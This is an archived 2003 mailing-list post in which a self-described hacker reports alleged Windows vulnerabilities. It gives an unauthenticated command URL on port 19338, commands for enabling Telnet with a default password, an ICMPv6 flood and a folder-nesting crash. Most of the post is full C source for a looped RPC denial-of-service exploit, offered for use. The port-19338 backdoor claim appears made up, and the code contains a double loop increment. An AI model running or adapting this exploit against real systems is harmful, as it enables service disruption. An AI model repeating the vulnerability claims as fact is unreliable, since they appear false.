New Secuity Vulnerabilities

mba1_at_012.net.il
Date: 06/04/03

  • Next message: chris_at_cmc.optus.net.au: "Frame pointer overwriting and FreeBSD"
    To: vuln-dev@securityfocus.com
    Date: Tue, 3 Jun 2003 18:34:17 -0400
    
    

    Hello, im Moshe BA from israel a.k.a Trancer and I would like to report 4-5
    security bugs\vulnerabilities witch i found.
    (Note: i'm sorry if my english is a bit bad, i'm an israeli after all)

    I've already talked with Dave McKinney via e-mail and he refferd me to this
    e-mail.
    This is the talk we had:

    From: Dave McKinney <dm@securityfocus.com>
    To: mba1@012.net.il <mba1@012.net.il>
    Subject: RE: New Secuity Vulnerabilities (fwd)
    Date: Tue, 3 Jun 2003 14:27:55 -0600 (MDT)

    Trancer,

    Can you send your report to the vuln-dev mailing list
    (vuln-dev@securityfocus.com)?

    Dave McKinney
    Symantec

    keyID: BF919DD7
    key fingerprint = 494D 6B7D 4611 7A7A 5DBB 3B29 4D89 3A70 BF91 9DD7

    On Tue, 3 Jun 2003, mba1@012.net.il wrote:

    > No you don't, that's what makes it so easy to hack windows server 2003.
    And
    > that's the reason i want this vulnerability to be reported.
    >
    > Original Message:
    > -----------------
    > From: Dave McKinney dm@securityfocus.com
    > Date: Tue, 3 Jun 2003 09:05:29 -0600 (MDT)
    > To: mba1@012.net.il
    > Subject: RE: New Secuity Vulnerabilities (fwd)
    >
    >
    >
    > Hmm do you need to enter the admin or other user password to access the
    > command line on port 19338?
    >
    > Dave McKinney
    > Symantec
    >
    > keyID: BF919DD7
    > key fingerprint = 494D 6B7D 4611 7A7A 5DBB 3B29 4D89 3A70 BF91 9DD7
    >
    >
    > On Mon, 2 Jun 2003, mba1@012.net.il wrote:
    >
    > > I preffer Trancer (over Moshe)
    > > I didn't realy understand your question. please ask again but in a more
    > > easyer way (after all, i'm an israeli).
    > >
    > > Original Message:
    > > -----------------
    > > From: Dave McKinney dm@securityfocus.com
    > > Date: Mon, 2 Jun 2003 16:34:47 -0600 (MDT)
    > > To: mba1@012.net.il, vuldb@securityfocus.com
    > > Subject: New Secuity Vulnerabilities (fwd)
    > >
    > >
    > >
    > > Moshe, with regards to issue #2, I am assuming you need valid
    credentials
    > > to access the command line interpreter on port 19338?
     
    Now, this is the security bugs\vulnerabilities.

    **********

    The first one is two Windows Server 2003 security vulnerabilities

    1. Windows 2003 Server has a built in Command Line Interreptor (I don't
    know if this service is enabled by defult but i've tested this on 9
    systems,
    in 7 of them it worked), which means that you can send commands to it using
    the HTTP (TCP)
       method (the web browser) by trying to access the server on port 19338
    like this:

    http://admin@>:19338/cmd.cgi?cmd=<EnterCommandHere>

    That will cause the server to run the command from the $ROOT$ drive.
    Which may be either C/D/E or any other drive defined by the owner / admin
    of the machine.
    Note that no username or password are requierd.

    2. Windows 2003 Server has a built in Telnet service (disabled by defult)
    that listens to open connections on port 3382.
    An attacker can exploit the first vulnerability (#1 above) and write this
    commands there -

    "sc config TlntSvr start= auto"
    and them:
    "net start TlntSvr"

    then the attacker has FULL access to the system.
    Only a password is requierd, and becouse i've just enabled this service,
    the password is also set to defult -
    Password: tlntadmn

    Note that if this sevice is already enabled, the password wil be wrong
    (only if the system admin changed it)
    If that service is already enabled with aa other password, the attacker can
    open a sharing service or any other service that can give him easy
    access tot he system.

    **********

    The secound one is Windows NT (2000\XP\2003) ICMPv6 Flooding
    This little Denial of Service attack works jst like ICMP flood but it uses
    Ping6 tool (in IPv6 enabled Windows OS or an IPv6 enabled *nix OS)
    This attack is also good becouse Microsoft's Internet Connection Firewall
    is unable to block IPv6 traffic.
    This is maybe a slow attack but effective, it is also depends on the
    attacker and victim's bandwidth.
    An exploit for this can be easly made, and i am working on one.

    **********

    This bug will make Windows XP (all editions) to crash.
    Creat 122 folders one inside the other and naming them by one char' (like
    '1' or '0'). now go to one before the last dir' and right click the last
    folder. hover the mouse over the poped manu and the system will crash.
    Stupid one but it does crash the system.

    **********

    This is an upgraded exploit witch will DoS and crash a remote machine using
    the WinNuke.c exploit that exploits - Microsoft Windows RPC Service Denial
    of Service Vulnerability
    I've discoverd that you can STILL DoS and crash it even if it's patched
    (with an offical M$ patch) aginst it, by simply nuking it a lot of times,
    and fast.
    this is the exploit (MultiWinNuke.c a.k.a FixedWinNuke.c)

    ### Start MultiWinNuke.c ###

    /*
    * Microsoft Windows NT RPC Service Denial of Service Vulnerability
    *
    * Orginal Code By Lion @
    http://www.cnhonker.com
    * Upgraded By Trancer @ http://BinaryVision.tech.nu
    *
    * I have notice that even after a Windows NT system is patched aginst this
    vulnerability with an offical M$ update,
    * an attacker can still DoS that system if he activate this exploit a lot
    of times, fast.
    * So I've upgraded the exploit by looping it and letting you control the
    times you want to nuke a system
    * (with a patched 2000\XP 250-400 times is recommended).
    *
    * That's it. enjoy :-)
    \*

    #include <winsock2.h>
    #include <stdio.h>

    #pragma comment(lib, "ws2_32.lib")

    char sendcode1[] =
      "\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00\x02\x00\x00\x00"
      "\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
      "\x60\x9e\xe7\xb9\x52\x3d\xce\x11\xaa\xa1\x00\x00\x69\x01\x29\x3f"
      "\x02\x00\x02\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"
      "\x2b\x10\x48\x60\x02\x00\x00\x00\x05\x00\x00\x01\x10\x00\x00\x00"
      "\xd0\x16\x00\x00\x8f\x00\x00\x00\x20\x27\x01\x00\x00\x00\x02\x00"
      "\xf0\x00\x00\x00\x00\x00\x00\x00\xf0\x00\x00\x00";

    char sendcode2[] =
      "\x88\x13\x00\x00\x00\x00\x00\x00\x88\x13\x00\x00";

    char sendcode3[] =
      "\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00"
      "\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00";

    char sendcode4[] =
      "\xfe\xff\x00\x00\x00\x00\x00\x00\xfe\xff\x00\x00\x3d\x3d\x3d\x3d"
      "\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d"
      "\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\x8f\x00\x00\x00"
      "\x50\x10\x01\x00\x00\x00\x02\x00";

    char sendcode5[] =
      "\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\x8f\x00\x00\x00"
      "\x80\xf9\x00\x00\x00\x00\x02\x00";

    char sendcode6[] =
      "\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\x8f\x00\x00\x00"
      "\xb0\xe2\x00\x00\x00\x00\x02\x00";

    char sendcode7[] =
      "\x05\x00\x00\x02\x10\x00\x00\x00\x60\x15\x00\x00\x8f\x00\x00\x00"
      "\x60\x15\x00\x00\x00\x00\x02\x00";

    char sendcode8[] =
      "\x00\x00\x01\x10\x00\x00\x00\x00\x00\x00\x01\x10\x00\x00";

    int main(int argc, char *argv[])
    {
      WSADATA wsaData;
      WORD wVersionRequested;
      struct hostent *pTarget;
      struct sockaddr_in sock;
      char *targetip;
      int port,bufsize,times,i;
      SOCKET s;
      char buffer[20480];

      printf("======================= Windows NT Multi RPC Nuke V0.12
    ======================\r\n");
      printf("=============== Orginal Code By Lion @ http://www.cnhonker.com
    ===============\r\n");
      printf("============= Upgraded By Trancer @ http://BinaryVision.tech.nu
    ==============\r\n\n");

      if (argc < 2)
      {
        printf("Usage:\r\n");
        printf(" %s <TargetIP> <TargetPort> <BufferSize> <Times>\r\n", argv[0]);
        printf("Exaple: %s 198.167.0.1 135 512 250\r\n", argv[0]);
        printf("PS:\r\n");
        printf(" If target is XP, try 2 times.\r\n");
        exit(1);
      }

      wVersionRequested = MAKEWORD(1, 1);
      if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;

      targetip = argv[1];
      port = 135;
      if (argc >= 3) port = atoi(argv[2]);
      bufsize = 512;
      if (argc >= 4) bufsize = atoi(argv[3]);
      times = 1;
      if (argc >= 5) times = atoi(argv[4]);

      for (i = 0; i < times; i = i + 1)
      {

        s = socket(AF_INET, SOCK_STREAM, 0);
        if(s==INVALID_SOCKET)
        {
          printf("Socket error!\r\n");
          exit(1);
        }

        printf("Resolving Hostnames...\n");
        if ((pTarget = gethostbyname(targetip)) == NULL)
        {
          printf("Resolve of %s failed, please try again.\n", argv[1]);
          exit(1);
        }

        memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
        sock.sin_family = AF_INET;
        sock.sin_port = htons((USHORT)port);

        printf("Connecting...\n");
        if ( (connect(s, (struct sockaddr *)&sock, sizeof (sock) )))
        {
          printf("Couldn't connect to host.\n");
          exit(1);
        }

        printf("Connected!...\n");
        printf("Sending Packets...\n");
        if (send(s, sendcode1, sizeof(sendcode1)-1, 0) == -1)
        {
          printf("Error sending nuke Packets\r\n");
          closesocket(s);
          exit(1);
        }

        memset(&buffer, '\x41', 240);
        send(s, buffer, 240, 0);

        send(s, sendcode2, sizeof(sendcode2)-1, 0);
        memset(&buffer, '\x42', 5000);
        send(s, buffer, 5000, 0);

        send(s, sendcode3, sizeof(sendcode3)-1, 0);
        memset(&buffer, '\x43', 512);
        send(s, buffer, 512, 0);
      
        send(s, sendcode4, sizeof(sendcode4)-1, 0);
        memset(&buffer, '\x44', 20480);
        send(s, buffer, 20480, 0);

        memset(&buffer, '\x44', 5000);
        send(s, buffer, 5000, 0);

        send(s, sendcode5, sizeof(sendcode5)-1, 0);
        memset(&buffer, '\x45', 5000);
        send(s, buffer, 5000, 0);

        send(s, sendcode6, sizeof(sendcode6)-1, 0);
        memset(&buffer, '\x46', 5000);
        send(s, buffer, 5000, 0);

        send(s, sendcode7, sizeof(sendcode7)-1, 0);
        memset(&buffer, '\x47', 5000);
        send(s, buffer, 5000, 0);

        send(s, sendcode8, sizeof(sendcode8)-1, 0);
        memset(&buffer, '\x48', 5000);
        send(s, buffer, 5000, 0);
        i = i + 1;
      }

      if (times < 2)
      {
        printf("Nuked! If target is XP, try a again! :)\r\n");
      }
      else
      {
        printf("%s was nuked %s times\r\n", argv[1], argv[4]);
      }
      
      closesocket(s);
      WSACleanup();
      return 0;
    }

    ### End MultiWinNuke.c ###

    That's it. note all of the bugs above were found by me, and i'll be glad if
    they will be reported.
    Trancer

    --------------------------------------------------------------------
    mail2web - Check your email from the web at
    http://mail2web.com/ .


  • Next message: chris_at_cmc.optus.net.au: "Frame pointer overwriting and FreeBSD"

    Relevant Pages

    • [NT] Unchecked buffer in the Multiple UNC Provider Could Enable Code Execution
      ... The MUP receives commands containing UNC names from ... There is proper input checking in this first buffer. ... * Microsoft Windows NT 4.0 Workstation ... the vulnerability could only be exploited by a user who could ...
      (Securiteam)
    • Re: newbie: I/O with nasm
      ... BOOL ReadFile( ... BOOL WriteFile( ... Now, if Windows is what TK is looking for, we've got something to go on. ... Pointer to the buffer that receives the data read from the file. ...
      (alt.lang.asm)
    • SecurityFocus Microsoft Newsletter #194
      ... Snitz Forums Register Script HTML Injection Vulnerability ... Relevant URL: http://www.securityfocus.com/bid/10530 ... An attacker may be able to steal the site administrator's credentials by exploiting this issue. ... When this URI is processed the issue leads to a crash in the running instance of Internet Explorer and all windows spawned from this instance. ...
      (Focus-Microsoft)
    • [NT] Buffer Overrun in Windows Kernel Message Handling could Lead to Elevated Privileges
      ... The Windows kernel is the core of the operating system. ... There is a flaw in the way the kernel passes error messages to a debugger. ... A vulnerability results because an attacker could write a program to ...
      (Securiteam)
    • Re: 265,000 new zombie PCs a day!
      ... there are so many holes in OS X that will let an attacker ... Windows never was designed to be a network, ... Apple hasn't fixed the "entire problem" on OS X. ... in privileges. ...
      (comp.sys.mac.advocacy)